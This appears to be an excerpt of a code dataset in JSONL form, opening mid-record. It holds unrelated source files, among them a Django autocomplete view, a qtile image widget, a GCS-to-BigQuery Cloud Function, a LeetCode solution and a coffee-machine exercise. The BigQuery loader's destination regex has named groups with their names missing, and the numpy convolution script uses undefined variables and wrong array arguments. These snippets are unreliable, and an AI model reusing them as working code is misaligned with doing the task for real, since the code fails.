context_instance=RequestContext(request))\n search = SearchForm()['searchBar']\n \n # GET request\n return render(request, 'maplist/index.html', {'form': search})\n\nfrom django.http import HttpResponse\nimport json\n\ndef autocomplete(request):\n query = request.GET.get('query', '')\n queryset = SearchQuerySet().autocomplete(text_auto=query)[:5]\n\n # merge film object to single string\n results = []\n for q in queryset:\n results.append(\n q.object.name + ' (' + q.object.year +') @ ' + q.object.location)\n results = {\n 'query': query,\n 'suggestions': results\n }\n\n data = json.dumps(results)\n return HttpResponse(data, 'application/json')\n","sub_path":"maplist/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"450718620","text":"import os\nimport cairocffi\n\nfrom . import base\nfrom .. 
import bar\n\nclass Image(base._Widget, base.MarginMixin):\n    \"\"\"\n    Display a PNG image on the bar.\n    \"\"\"\n    defaults = [\n        (\"scale\", True, \"Enable/Disable image scaling\"),\n        (\"filename\", None, \"PNG Image filename. Can contain '~'\"),\n    ]\n\n    def __init__(self, width=bar.CALCULATED, **config):\n        base._Widget.__init__(self, width, **config)\n        self.add_defaults(Image.defaults)\n        self.add_defaults(base.MarginMixin.defaults)\n\n        # make the default 0 instead\n        self._widget_defaults[\"margin\"] = 0\n\n    def _configure(self, qtile, bar):\n        base._Widget._configure(self, qtile, bar)\n\n        if not self.filename:\n            raise ValueError(\"Filename not set!\")\n\n        self.filename = os.path.expanduser(self.filename)\n\n        try:\n            self.image = cairocffi.ImageSurface.create_from_png(self.filename)\n        except MemoryError:\n            raise ValueError(\"The image '%s' doesn't seem to be a valid PNG\"\n                             % (self.filename))\n\n        self.pattern = cairocffi.SurfacePattern(self.image)\n\n        self.image_width = self.image.get_width()\n        self.image_height = self.image.get_height()\n\n        if self.scale:\n            new_height = self.bar.height - (self.margin_y * 2)\n\n            if new_height and self.image_height != new_height:\n                scaler = cairocffi.Matrix()\n                sp = self.image_height / float(new_height)\n                self.image_height = new_height\n                self.image_width = int(self.image_width / sp)\n                scaler.scale(sp, sp)\n                self.pattern.set_matrix(scaler)\n\n    def draw(self):\n        self.drawer.clear(self.bar.background)\n        self.drawer.ctx.save()\n        self.drawer.ctx.translate(self.margin_x, self.margin_y)\n        self.drawer.ctx.set_source(self.pattern)\n        self.drawer.ctx.paint()\n        self.drawer.ctx.restore()\n\n        self.drawer.draw(self.offset, self.width)\n\n    def calculate_width(self):\n        return self.image_width + (self.margin_x * 2)\n","sub_path":"libqtile/widget/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"352590506","text":"def get_payment_link(sum, number, comment):\n\tlink = \"https://qiwi.com/payment/form/99?extra%5B%27account%27%5D={}&amountInteger={}&amountFraction=0&extra%5B%27comment%27%5D={}&currency=643&blocked[0]=sum&blocked[1]=comment&blocked[2]=account\"\n\tlink = link.format(number, sum, comment)\n\treturn link\n\ndef message_logger(text, username):\n\t# the log file already exists\n\ttry:\n\t\twith open(\"log.txt\", \"a\", encoding=\"utf-8\") as f:\n\t\t\tf.write(\"{} | @{}\\n\".format(text, username))\n\n\t# create the log file\n\texcept:\n\t\twith open(\"log.txt\", \"w\", encoding=\"utf-8\") as f:\n\t\t\tf.write(\"{} | @{}\\n\".format(text, username))\n\n\ndef get_all_users(file=\"base.txt\"):\n\twith open(file, \"r\", encoding=\"utf-8\") as f:\n\t\tusers = f.read()\n\n\tusers = users.split(\"\\n\")\n\n\treturn users[:-1]\n\n\ndef get_buyers(file=\"pays_base.txt\"):\n\twith open(file, \"r\", encoding=\"utf-8\") as f:\n\t\tusers = f.read()\n\n\tusers = users.split(\"\\n\")\n\n\treturn users[:-1]\n\n\t","sub_path":"src/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"468271355","text":"class Solution:\n    def mostCommonWord0(self, paragraph, banned):\n        paragraph = paragraph.lower()\n        paragraph += '.'\n        d = dict()\n        st = \"\"\n        for ch in paragraph:\n            if 'a' <= ch <= 'z':\n                st = st + ch\n            else:\n                if st:\n                    if st in d:\n                        d[st] += 1\n                    else:\n                        d[st] = 1\n                    st = \"\"\n\n        max_count = 0\n        res = \"\"\n        for k, v in d.items():\n            if k not in banned and v 
> max_count:\n max_count = v\n res = k\n\n return res\n\n def mostCommonWord(self, paragraph, banned):\n banset = set(banned)\n import collections\n count = collections.Counter(\n word.strip(\"!?',;.\") for word in paragraph.lower().split())\n\n ans, best = '', 0\n for word in count:\n if count[word] > best and word not in banset:\n ans, best = word, count[word]\n\n return ans\n","sub_path":"Solutions/819. Most Common Word/819.py","file_name":"819.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"266027192","text":"# Copyright 2020 Google LLC.\n# This software is provided as-is, without warranty or representation\n# for any use or purpose.\n# Your use of it is subject to your agreement with Google.\n\n# Licensed under the Apache License, Version 2.0 (the 'License');\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an 'AS IS' BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Background Cloud Function for loading data from GCS to BigQuery.\n\"\"\"\nimport collections\nimport collections.abc\nimport copy\nimport json\nimport os\nimport pathlib\nimport re\nimport time\nfrom typing import Any, Deque, Dict, List, Optional, Tuple\n\nimport cachetools\nimport google.api_core.client_info\nimport google.api_core.exceptions\nimport google.cloud.exceptions\nfrom google.cloud import bigquery, storage\n\n# https://cloud.google.com/bigquery/quotas#load_jobs\n# 15TB per BQ load job (soft limit).\nDEFAULT_MAX_BATCH_BYTES = str(15 * 10**12)\n# 10,000 GCS URIs per BQ load job.\nMAX_SOURCE_URIS_PER_LOAD = 10**4\n\nDEFAULT_EXTERNAL_TABLE_DEFINITION = {\n # The default must be a self describing data format\n # because autodetecting CSV /JSON schemas is likely to not match\n # expectations / assumptions of the transformation query.\n \"sourceFormat\": \"PARQUET\",\n}\n\nDEFAULT_JOB_LABELS = {\n \"component\": \"event-based-gcs-ingest\",\n \"cloud-function-name\": os.getenv(\"FUNCTION_NAME\"),\n}\n\nBASE_LOAD_JOB_CONFIG = {\n \"sourceFormat\": \"CSV\",\n \"fieldDelimiter\": \",\",\n \"writeDisposition\": \"WRITE_APPEND\",\n \"labels\": DEFAULT_JOB_LABELS,\n}\n\n# yapf: disable\nDEFAULT_DESTINATION_REGEX = (\n r\"^(?P[\\w\\-\\._0-9]+)/\" # dataset (required)\n r\"(?P[\\w\\-_0-9]+)/?\" # table name (required)\n r\"(?P\\$[0-9]+)?/?\" # partition decorator (optional)\n r\"(?P[0-9]{4})?/?\" # partition year (yyyy) (optional)\n r\"(?P[0-9]{2})?/?\" # partition month (mm) (optional)\n r\"(?P
[0-9]{2})?/?\" # partition day (dd) (optional)\n r\"(?P[0-9]{2})?/?\" # partition hour (hh) (optional)\n r\"(?P[\\w\\-_0-9]+)?/\" # batch id (optional)\n)\n# yapf: enable\n\n# Will wait up to this polling for errors before exiting\n# This is to check if job fail quickly, not to assert it succeed.\n# This may not be honored if longer than cloud function timeout.\n# https://cloud.google.com/functions/docs/concepts/exec#timeout\n# One might consider lowering this to 1-2 seconds to lower the\n# upper bound of expected execution time to stay within the free tier.\n# https://cloud.google.com/functions/pricing#free_tier\nWAIT_FOR_JOB_SECONDS = int(os.getenv(\"WAIT_FOR_JOB_SECONDS\", \"5\"))\n\n# Use caution when lowering the job polling rate.\n# Keep in mind that many concurrent executions of this cloud function should not\n# violate the 300 concurrent requests or 100 request per second.\n# https://cloud.google.com/bigquery/quotas#all_api_requests\nJOB_POLL_INTERVAL_SECONDS = 1\n\nSUCCESS_FILENAME = os.getenv(\"SUCCESS_FILENAME\", \"_SUCCESS\")\n\nCLIENT_INFO = google.api_core.client_info.ClientInfo(\n user_agent=\"google-pso-tool/bq-severless-loader\")\n\nDEFAULT_JOB_PREFIX = \"gcf-ingest-\"\n\n\ndef main(event: Dict, context): # pylint: disable=unused-argument\n \"\"\"entry point for background cloud function for event driven GCS to\n BigQuery ingest.\"\"\"\n # pylint: disable=too-many-locals\n # Set by Cloud Function Execution Environment\n # https://cloud.google.com/functions/docs/env-var\n destination_regex = os.getenv(\"DESTINATION_REGEX\",\n DEFAULT_DESTINATION_REGEX)\n dest_re = re.compile(destination_regex)\n\n bucket_id, object_id = parse_notification(event)\n\n # Exit eagerly if not a success file.\n # we can improve this with pub/sub message filtering once it supports\n # a hasSuffix filter function (we can filter on hasSuffix successfile name)\n # https://cloud.google.com/pubsub/docs/filtering\n if not object_id.endswith(f\"/{SUCCESS_FILENAME}\"):\n print(\n f\"No-op. 
This notification was not for a {SUCCESS_FILENAME} file.\")\n return\n\n prefix_to_load = removesuffix(object_id, SUCCESS_FILENAME)\n gsurl = f\"gs://{bucket_id}/{prefix_to_load}\"\n gcs_client = storage.Client(client_info=CLIENT_INFO)\n project = gcs_client.project\n bkt = cached_get_bucket(gcs_client, bucket_id)\n success_blob: storage.Blob = bkt.blob(object_id)\n handle_duplicate_notification(bkt, success_blob, gsurl)\n\n destination_match = dest_re.match(object_id)\n if not destination_match:\n raise RuntimeError(f\"Object ID {object_id} did not match regex:\"\n f\" {destination_regex}\")\n destination_details = destination_match.groupdict()\n try:\n dataset = destination_details['dataset']\n table = destination_details['table']\n except KeyError:\n raise RuntimeError(\n f\"Object ID {object_id} did not match dataset and table in regex:\"\n f\" {destination_regex}\") from KeyError\n partition = destination_details.get('partition')\n year, month, day, hour = (\n destination_details.get(key, \"\") for key in ('yyyy', 'mm', 'dd', 'hh'))\n part_list = (year, month, day, hour)\n if not partition and any(part_list):\n partition = '$' + ''.join(part_list)\n batch_id = destination_details.get('batch')\n labels = DEFAULT_JOB_LABELS\n labels[\"bucket\"] = bucket_id\n\n if batch_id:\n labels[\"batch-id\"] = batch_id\n\n if partition:\n dest_table_ref = bigquery.TableReference.from_string(\n f\"{dataset}.{table}{partition}\", default_project=project)\n else:\n dest_table_ref = bigquery.TableReference.from_string(\n f\"{dataset}.{table}\", default_project=project)\n\n default_query_config = bigquery.QueryJobConfig()\n default_query_config.use_legacy_sql = False\n default_query_config.labels = labels\n bq_client = bigquery.Client(client_info=CLIENT_INFO,\n default_query_job_config=default_query_config)\n\n print(\"looking for bq_transform.sql\")\n external_query_sql = read_gcs_file_if_exists(\n gcs_client, f\"{gsurl}_config/bq_transform.sql\")\n if not external_query_sql:\n external_query_sql = look_for_config_in_parents(gcs_client, gsurl,\n \"bq_transform.sql\")\n if external_query_sql:\n print(\"EXTERNAL QUERY\")\n print(f\"found external query:\\n{external_query_sql}\")\n external_query(gcs_client, bq_client, gsurl, external_query_sql,\n dest_table_ref,\n create_job_id_prefix(dest_table_ref, batch_id))\n return\n\n print(\"LOAD_JOB\")\n load_batches(gcs_client, bq_client, gsurl, dest_table_ref,\n create_job_id_prefix(dest_table_ref, batch_id))\n\n\ndef create_job_id_prefix(dest_table_ref: bigquery.TableReference,\n batch_id: Optional[str]):\n \"\"\"Create job id prefix with a consistent naming convention.\n The naming conventions is as follows:\n gcf-ingest-----\n Parts that are not inferrable from the GCS path with have a 'None'\n placeholder. 
This naming convention is crucial for monitoring the system.\n Note, gcf-ingest- can be overridden with environment variable JOB_PREFIX\n\n Examples:\n\n Non-partitioned Non batched tables:\n - gs://${BUCKET}/tpch/lineitem/_SUCCESS\n - gcf-ingest-tpch-lineitem-None-None-\n Non-partitioned batched tables:\n - gs://${BUCKET}/tpch/lineitem/batch000/_SUCCESS\n - gcf-ingest-tpch-lineitem-None-batch000-\n Partitioned Batched tables:\n - gs://${BUCKET}/tpch/lineitem/$20201031/batch000/_SUCCESS\n - gcf-ingest-tpch-lineitem-20201031-batch000-\n \"\"\"\n table_partition = dest_table_ref.table_id.split(\"$\")\n if len(table_partition) < 2:\n # If there is no partition put a None placeholder\n table_partition.append(\"None\")\n return f\"{os.getenv('JOB_PREFIX', DEFAULT_JOB_PREFIX)}\" \\\n f\"{dest_table_ref.dataset_id}-\" \\\n f\"{'-'.join(table_partition)}-\" \\\n f\"{batch_id}-\"\n\n\ndef external_query( # pylint: disable=too-many-arguments\n gcs_client: storage.Client, bq_client: bigquery.Client, gsurl: str,\n query: str, dest_table_ref: bigquery.TableReference,\n job_id_prefix: str):\n \"\"\"Load from query over external table from GCS.\n\n This hinges on a SQL query defined in GCS at _config/bq_transform.sql and\n an external table definition _config/external.json (otherwise will assume\n CSV external table)\n \"\"\"\n external_table_config = read_gcs_file_if_exists(\n gcs_client, f\"{gsurl}_config/external.json\")\n if not external_table_config:\n external_table_config = look_for_config_in_parents(\n gcs_client, gsurl, \"external.json\")\n if external_table_config:\n external_table_def = json.loads(external_table_config)\n else:\n print(f\"Falling back to default CSV external table.\"\n f\" {gsurl}_config/external.json not found.\")\n external_table_def = DEFAULT_EXTERNAL_TABLE_DEFINITION\n\n external_table_def[\"sourceUris\"] = flatten2dlist(\n get_batches_for_prefix(gcs_client, gsurl))\n print(f\"external table def = {json.dumps(external_table_config, indent=2)}\")\n external_config = bigquery.ExternalConfig.from_api_repr(external_table_def)\n job_config = bigquery.QueryJobConfig(\n table_definitions={\"temp_ext\": external_config}, use_legacy_sql=False)\n\n # Note, dest_table might include a partition decorator.\n rendered_query = query.format(\n dest_dataset=dest_table_ref.dataset_id,\n dest_table=dest_table_ref.table_id,\n )\n\n job: bigquery.QueryJob = bq_client.query(\n rendered_query,\n job_config=job_config,\n job_id_prefix=job_id_prefix,\n )\n\n print(f\"started asynchronous query job: {job.job_id}\")\n\n start_poll_for_errors = time.monotonic()\n # Check if job failed quickly\n while time.monotonic() - start_poll_for_errors < WAIT_FOR_JOB_SECONDS:\n job.reload()\n if job.errors:\n msg = f\"query job {job.job_id} failed quickly: {job.errors}\"\n for err in job.errors:\n # BQ gives confusing warning about missing dataset if the\n # external query refers to the wrong external table name.\n # In this case we can give the end user a little more context.\n if \"missing dataset\" in err.get(\"message\", \"\"):\n raise RuntimeError(\n \"External queries must select from the external table \"\n \"named 'temp_ext'. This error may be due to specifying\"\n \"the wrong name for the external table. 
\" + msg)\n raise RuntimeError(msg)\n time.sleep(JOB_POLL_INTERVAL_SECONDS)\n\n\ndef flatten2dlist(arr: List[List[Any]]) -> List[Any]:\n \"\"\"Flatten list of lists to flat list of elements\"\"\"\n return [j for i in arr for j in i]\n\n\ndef load_batches(gcs_client, bq_client, gsurl, dest_table_ref, job_id_prefix):\n \"\"\"orchestrate 1 or more load jobs based on number of URIs and total byte\n size of objects at gsurl\"\"\"\n batches = get_batches_for_prefix(gcs_client, gsurl)\n load_config = construct_load_job_config(gcs_client, gsurl)\n load_config.labels = DEFAULT_JOB_LABELS\n batch_count = len(batches)\n\n jobs: List[bigquery.LoadJob] = []\n for batch_num, batch in enumerate(batches):\n print(load_config.to_api_repr())\n job: bigquery.LoadJob = bq_client.load_table_from_uri(\n batch,\n dest_table_ref,\n job_config=load_config,\n job_id_prefix=f\"{job_id_prefix}{batch_num}-of-{batch_count}-\",\n )\n\n print(f\"started asyncronous bigquery load job with id: {job.job_id} for\"\n f\" {gsurl}\")\n jobs.append(job)\n\n start_poll_for_errors = time.monotonic()\n # Check if job failed quickly\n while time.monotonic() - start_poll_for_errors < WAIT_FOR_JOB_SECONDS:\n # Check if job failed quickly\n for job in jobs:\n job.reload()\n if job.errors:\n raise RuntimeError(\n f\"load job {job.job_id} failed quickly: {job.errors}\")\n time.sleep(JOB_POLL_INTERVAL_SECONDS)\n\n\ndef handle_duplicate_notification(bkt: storage.Bucket,\n success_blob: storage.Blob, gsurl: str):\n \"\"\"\n Need to handle potential duplicate Pub/Sub notifications.\n To achieve this we will drop an empty \"claimed\" file that indicates\n an invocation of this cloud function has picked up the success file\n with a certain creation timestamp. This will support republishing the\n success file as a mechanism of re-running the ingestion while avoiding\n duplicate ingestion due to multiple Pub/Sub messages for a success file\n with the same creation time.\n \"\"\"\n success_blob.reload()\n success_created_unix_timestamp = success_blob.time_created.timestamp()\n\n claim_blob: storage.Blob = bkt.blob(\n success_blob.name.replace(SUCCESS_FILENAME,\n f\"_claimed_{success_created_unix_timestamp}\"))\n try:\n claim_blob.upload_from_string(\"\", if_generation_match=0)\n except google.api_core.exceptions.PreconditionFailed as err:\n raise RuntimeError(\n f\"The prefix {gsurl} appears to already have been claimed for \"\n f\"{gsurl}{SUCCESS_FILENAME} with created timestamp\"\n f\"{success_created_unix_timestamp}.\"\n \"This means that another invocation of this cloud function has\"\n \"claimed the ingestion of this batch.\"\n \"This may be due to a rare duplicate delivery of the Pub/Sub \"\n \"storage notification.\") from err\n\n\ndef _get_parent_config_file(storage_client, config_filename, bucket, path):\n config_dir_name = \"_config\"\n parent_path = pathlib.Path(path).parent\n config_path = parent_path / config_dir_name / config_filename\n return read_gcs_file_if_exists(storage_client,\n f\"gs://{bucket}/{config_path}\")\n\n\ndef look_for_config_in_parents(storage_client: storage.Client, gsurl: str,\n config_filename: str) -> Optional[str]:\n \"\"\"look in parent directories for _config/config_filename\"\"\"\n blob: storage.Blob = storage.Blob.from_string(gsurl)\n bucket_name = blob.bucket.name\n obj_path = blob.name\n parts = removesuffix(obj_path, \"/\").split(\"/\")\n\n def _get_parent_query(path):\n return _get_parent_config_file(storage_client, config_filename,\n bucket_name, path)\n\n config = None\n while parts:\n if config:\n 
return config\n config = _get_parent_query(\"/\".join(parts))\n parts.pop()\n return config\n\n\ndef construct_load_job_config(storage_client: storage.Client,\n gsurl: str) -> bigquery.LoadJobConfig:\n \"\"\"\n merge dictionaries for loadjob.json configs in parent directories.\n The configs closest to gsurl should take precedence.\n \"\"\"\n config_filename = \"load.json\"\n blob: storage.Blob = storage.Blob.from_string(gsurl)\n bucket_name = blob.bucket.name\n obj_path = blob.name\n parts = removesuffix(obj_path, \"/\").split(\"/\")\n\n def _get_parent_config(path):\n return _get_parent_config_file(storage_client, config_filename,\n bucket_name, path)\n\n config_q: Deque[Dict[str, Any]] = collections.deque()\n config_q.append(BASE_LOAD_JOB_CONFIG)\n while parts:\n config = _get_parent_config(\"/\".join(parts))\n if config:\n config_q.append(json.loads(config))\n parts.pop()\n\n merged_config: Dict = {}\n while config_q:\n recursive_update(merged_config, config_q.popleft(), in_place=True)\n print(f\"merged_config: {merged_config}\")\n return bigquery.LoadJobConfig.from_api_repr({\"load\": merged_config})\n\n\ndef get_batches_for_prefix(gcs_client: storage.Client,\n prefix_path: str,\n ignore_subprefix=\"_config/\",\n ignore_file=SUCCESS_FILENAME) -> List[List[str]]:\n \"\"\"\n This function creates batches of GCS uris for a given prefix.\n This prefix could be a table prefix or a partition prefix inside a\n table prefix.\n returns an Array of their batches\n (one batch has an array of multiple GCS uris)\n \"\"\"\n batches = []\n blob: storage.Blob = storage.Blob.from_string(prefix_path)\n bucket_name = blob.bucket.name\n prefix_name = blob.name\n\n prefix_filter = f\"{prefix_name}\"\n bucket = cached_get_bucket(gcs_client, bucket_name)\n blobs = list(bucket.list_blobs(prefix=prefix_filter, delimiter=\"/\"))\n\n cumulative_bytes = 0\n max_batch_size = int(os.getenv(\"MAX_BATCH_BYTES\", DEFAULT_MAX_BATCH_BYTES))\n batch: List[str] = []\n for blob in blobs:\n # API returns root prefix also. 
Which should be ignored.\n # Similarly, the _SUCCESS file should be ignored.\n # Finally, anything in the _config/ prefix should be ignored.\n if (blob.name\n not in {f\"{prefix_name}/\", f\"{prefix_name}/{ignore_file}\"}\n and not blob.name.startswith(f\"{prefix_name}/{ignore_subprefix}\")):\n if blob.size == 0: # ignore empty files\n print(f\"ignoring empty file: gs://{bucket_name}/{blob.name}\")\n continue\n cumulative_bytes += blob.size\n\n # keep adding until we reach the byte threshold or the URI limit\n if cumulative_bytes <= max_batch_size and len(\n batch) < MAX_SOURCE_URIS_PER_LOAD:\n batch.append(f\"gs://{bucket_name}/{blob.name}\")\n else:\n batches.append(batch.copy())\n batch.clear()\n batch.append(f\"gs://{bucket_name}/{blob.name}\")\n cumulative_bytes = blob.size\n\n # pick up remaining files in the final batch\n if len(batch) > 0:\n batches.append(batch.copy())\n batch.clear()\n\n if len(batches) > 1:\n print(f\"split into {len(batches)} load jobs.\")\n elif len(batches) == 1:\n print(\"using single load job.\")\n else:\n raise RuntimeError(\"No files to load!\")\n return batches\n\n\ndef parse_notification(notification: dict) -> Tuple[str, str]:\n \"\"\"validates notification payload\n Args:\n notification(dict): Pub/Sub Storage Notification\n https://cloud.google.com/storage/docs/pubsub-notifications\n Or Cloud Functions direct trigger\n https://cloud.google.com/functions/docs/tutorials/storage\n with notification schema\n https://cloud.google.com/storage/docs/json_api/v1/objects#resource\n Returns:\n tuple of bucketId and objectId attributes\n Raises:\n KeyError if the input notification does not contain the expected\n attributes.\n \"\"\"\n if notification.get(\"kind\") == \"storage#object\":\n # notification is GCS Object resource from Cloud Functions trigger\n # https://cloud.google.com/storage/docs/json_api/v1/objects#resource\n return notification[\"bucket\"], notification[\"name\"]\n if notification.get(\"attributes\"):\n # notification is Pub/Sub message.\n try:\n attributes = notification[\"attributes\"]\n return attributes[\"bucketId\"], attributes[\"objectId\"]\n except KeyError:\n raise RuntimeError(\n \"Issue with Pub/Sub message, did not contain expected \"\n f\"attributes: 'bucketId' and 'objectId': {notification}\"\n ) from KeyError\n raise RuntimeError(\n \"Cloud Function received unexpected trigger:\\n\"\n f\"{notification}\\n\"\n \"This function only supports direct Cloud Functions \"\n \"Background Triggers or Pub/Sub storage notifications \"\n \"as described in the following links:\\n\"\n \"https://cloud.google.com/storage/docs/pubsub-notifications\\n\"\n \"https://cloud.google.com/functions/docs/tutorials/storage\")\n\n\n# cache lookups against GCS API for 1 second as buckets / objects have update\n# limit of once per second and we might do several of the same lookup during\n# the function's lifetime. This should improve performance by eliminating\n# unnecessary API calls. 
The lookups on bucket and objects in this function\n# should not be changing during the function's lifetime as this would lead to\n# non-deterministic results with or without this cache.\n# https://cloud.google.com/storage/quotas\n@cachetools.cached(cachetools.TTLCache(maxsize=1024, ttl=1))\ndef read_gcs_file(gcs_client: storage.Client, gsurl: str) -> str:\n \"\"\"\n Read a GCS object as a string\n\n Args:\n gcs_client: GCS client\n gsurl: GCS URI for object to read in gs://bucket/path/to/object format\n Returns:\n str\n \"\"\"\n blob = storage.Blob.from_string(gsurl)\n return blob.download_as_bytes(client=gcs_client).decode('UTF-8')\n\n\ndef read_gcs_file_if_exists(gcs_client: storage.Client,\n gsurl: str) -> Optional[str]:\n \"\"\"return string of gcs object contents or None if the object does not exist\n \"\"\"\n try:\n return read_gcs_file(gcs_client, gsurl)\n except google.cloud.exceptions.NotFound:\n return None\n\n\n# Cache bucket lookups (see reasoning in comment above)\n@cachetools.cached(cachetools.TTLCache(maxsize=1024, ttl=1))\ndef cached_get_bucket(\n gcs_client: storage.Client,\n bucket_id: str,\n) -> storage.Bucket:\n \"\"\"get storage.Bucket object by bucket_id string if exists or raise\n google.cloud.exceptions.NotFound.\"\"\"\n return gcs_client.get_bucket(bucket_id)\n\n\ndef dict_to_bq_schema(schema: List[Dict]) -> List[bigquery.SchemaField]:\n \"\"\"Converts a list of dicts to list of bigquery.SchemaField for use with\n bigquery client library. Dicts must contain name and type keys.\n The dict may optionally contain a mode key.\"\"\"\n default_mode = \"NULLABLE\"\n return [\n bigquery.SchemaField(\n x[\"name\"],\n x[\"type\"],\n mode=x.get(\"mode\") if x.get(\"mode\") else default_mode)\n for x in schema\n ]\n\n\n# To be added to built in str in python 3.9\n# https://www.python.org/dev/peps/pep-0616/\ndef removesuffix(in_str: str, suffix: str) -> str:\n \"\"\"removes suffix from a string.\"\"\"\n # suffix='' should not call self[:-0].\n if suffix and in_str.endswith(suffix):\n return in_str[:-len(suffix)]\n return in_str[:]\n\n\ndef recursive_update(\n original: Dict,\n update: Dict,\n in_place: bool = False\n):\n \"\"\"\n return a recursively updated dictionary.\n\n Note, lists will be completely overwritten by value in update if there is a\n conflict.\n\n original: (dict) the base dictionary\n update: (dict) the dictionary of updates to apply on original\n in_place: (bool) if true then original will be mutated in place else a new\n dictionary as a result of the update will be returned.\n \"\"\"\n out = original if in_place else copy.deepcopy(original)\n\n for key, value in update.items():\n if isinstance(value, dict):\n out[key] = recursive_update(out.get(key, {}), value)\n else:\n out[key] = value\n return out\n","sub_path":"tools/cloud_functions/gcs_event_based_ingest/gcs_ocn_bq_ingest/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":23601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"392687638","text":"from mongoengine import *\nfrom schemas import CommentPage, Comment, Reply\n\"\"\"\nSimple test script to check the creation of collections \nand whether the schema is working\n\"\"\"\n\n\nconnect('assignment3db')\ncommentpage1 = CommentPage(file_path='testlink')\ncomment1 = Comment(username = \"Shrujan\", comment_text=\"Yo Yo Yo\", timestamp=\"4:20\")\nreply1 = Reply(username = \"Shrujan\", comment_text=\"Yo Yo Yo\", 
timestamp=\"4:20\")\n\ncommentpage1.comments.append(comment1)\ncomment1.replies.append(reply1)\n\ncommentpage1.save()\n","sub_path":"Assignment3.2/Portfolio/schemasTest.py","file_name":"schemasTest.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"77866278","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Mar 25 22:34:04 2018\n\n@author: vedanta\n\"\"\"\n\nimport numpy as np\n\ndef convolution(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n \n Y = np.zeros(n1+n2-1,m1+m2-1)\n \n for i in xrange(n1+m1-1):\n for ii in xrange(m1):\n for j in xrange(n2+m2-1):\n for jj in xrange(m2):\n Y[i,j] = H[ii,jj]*X[i-ii,j-jj]\n return Y\n\ndef convolution_vect(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n Y = np.zeros(n1+m1-1,n2+m2,-1)\n for i in xrange(n1):\n for j in xrange(n2):\n Y[i:i+m1,j:j+m2] += X[i,j]*W\n \ndef convolution_same(X,H):\n n1,n2 = X.shape\n m1,m2 = H.shape\n Y = np.zeros(n1+m1-1,n2+m2-1)\n for i in xrange(n1+m1-1):\n for ii in xrange(m1):\n for j in xrange(n2+m2-1):\n for jj in xrange(m2):\n Y[i,j] = H[ii,jj]*X[i-ii,j-jj]\n ret[m1,m2] = Y[m1/2:-m1/2 + 1,m2/2:-m2/2 +1]\n return ret \n \n \n","sub_path":"Basics/Convolution.py","file_name":"Convolution.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"559567325","text":"MENU = {\r\n \"espresso\": {\r\n \"ingredients\": {\r\n \"water\": 50,\r\n \"milk\": 0,\r\n \"coffee\": 18,\r\n },\r\n \"cost\": 1.5,\r\n },\r\n \"latte\": {\r\n \"ingredients\": {\r\n \"water\": 200,\r\n \"milk\": 150,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 2.5,\r\n },\r\n \"cappuccino\": {\r\n \"ingredients\": {\r\n \"water\": 250,\r\n \"milk\": 100,\r\n \"coffee\": 24,\r\n },\r\n \"cost\": 3.0,\r\n }\r\n}\r\n\r\nresources = {\r\n \"water\": 300,\r\n \"milk\": 200,\r\n \"coffee\": 100,\r\n \"money\": 0\r\n}\r\n\r\n\r\ndef print_report():\r\n print(f\"Water: {resources['water']}ml\")\r\n print(f\"Milk: {resources['milk']}ml\")\r\n print(f\"Coffee: {resources['coffee']}ml\")\r\n print(f\"Money: ${resources['money']:.2f}\")\r\n\r\n\r\ndef input_coins():\r\n quarters = int(input(\"How many quarters? \"))\r\n dimes = int(input(\"How many dimes? \"))\r\n nickels = int(input(\"How many nickels? \"))\r\n pennies = int(input(\"How many pennies? \"))\r\n return [quarters, dimes, nickels, pennies]\r\n\r\n\r\non = True\r\n\r\nwhile on:\r\n order = input(\"What would you like? (espresso/latte/cappuccino) \")\r\n if order == 'off':\r\n on = False\r\n elif order == 'report':\r\n print_report()\r\n else:\r\n enough = True\r\n for ingredient in [\"water\", \"milk\", \"coffee\"]:\r\n if MENU[order][\"ingredients\"][ingredient] > resources[ingredient]:\r\n enough = False\r\n print(f\"Sorry, there is not enough {ingredient}.\")\r\n break\r\n if enough:\r\n coins = input_coins()\r\n cash = 0.25*coins[0] + 0.1*coins[1] + 0.05*coins[2] + 0.01*coins[3]\r\n if cash < MENU[order][\"cost\"]:\r\n print(\"Sorry, that is not enough money. Money is refunded.\")\r\n else:\r\n if cash > MENU[order][\"cost\"]:\r\n print(f\"Here is your ${cash - MENU[order]['cost']:.2f} change.\")\r\n resources[\"money\"] += MENU[order][\"cost\"]\r\n for ingredient in [\"water\", \"milk\", \"coffee\"]:\r\n resources[ingredient] -= MENU[order][\"ingredients\"][ingredient]\r\n print(f\"Here is your {order}. 
